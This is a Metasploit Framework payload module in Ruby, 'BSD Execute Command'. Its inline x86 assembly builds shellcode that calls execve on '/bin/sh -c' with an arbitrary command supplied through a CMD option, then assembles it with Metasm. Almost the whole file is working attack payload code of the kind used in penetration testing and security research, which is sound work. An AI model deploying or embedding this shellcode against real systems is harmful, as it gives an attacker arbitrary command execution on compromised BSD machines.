metasploit-framework/modules/payloads/singles/bsd/x86/exec.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##


require 'msf/core'


###
#
# Exec
# ----
#
# Executes an arbitrary command.
#
###
module Metasploit3

	include Msf::Payload::Single
	include Msf::Payload::Bsd

	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'BSD Execute Command',
			'Version'       => '$Revision$',
			'Description'   => 'Execute an arbitrary command',
			'Author'        => 'vlad902',
			'License'       => MSF_LICENSE,
			'Platform'      => 'bsd',
			'Arch'          => ARCH_X86))

		# Register exec options
		register_options(
			[
				OptString.new('CMD',  [ true,  "The command string to execute" ]),
			], self.class)
	end

	#
	# Dynamically builds the exec payload based on the user's options.
	#
	def generate_stage
		cmd     = datastore['CMD'] || ''
		asm = <<-EOS
;;
;
;        Name: single_exec
;   Platforms: *BSD
;     Authors: vlad902 <vlad902 [at] gmail.com>
;     Version: $Revision$
;     License:
;
;        This file is part of the Metasploit Exploit Framework
;        and is subject to the same licenses and copyrights as
;        the rest of this package.
;
; Description:
;
;        Execute an arbitary command.
;
;;
; NULLs are fair game.

	push	0x3b
	pop	eax
	cdq

	push	edx
	push	0x632d
	mov	edi, esp

	push	edx
	push	0x68732f6e
	push	0x69622f2f
	mov	ebx, esp

	push	edx
	call	getstr
db "CMD", 0x00
getstr:
	push	edi
	push	ebx
	mov	ecx, esp
	push	edx
	push	ecx
	push	ebx
	push	eax
	int	0x80
EOS
		asm.gsub!(/CMD/, cmd.gsub('"', "\\\""))
		payload = Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encode_string
	end

end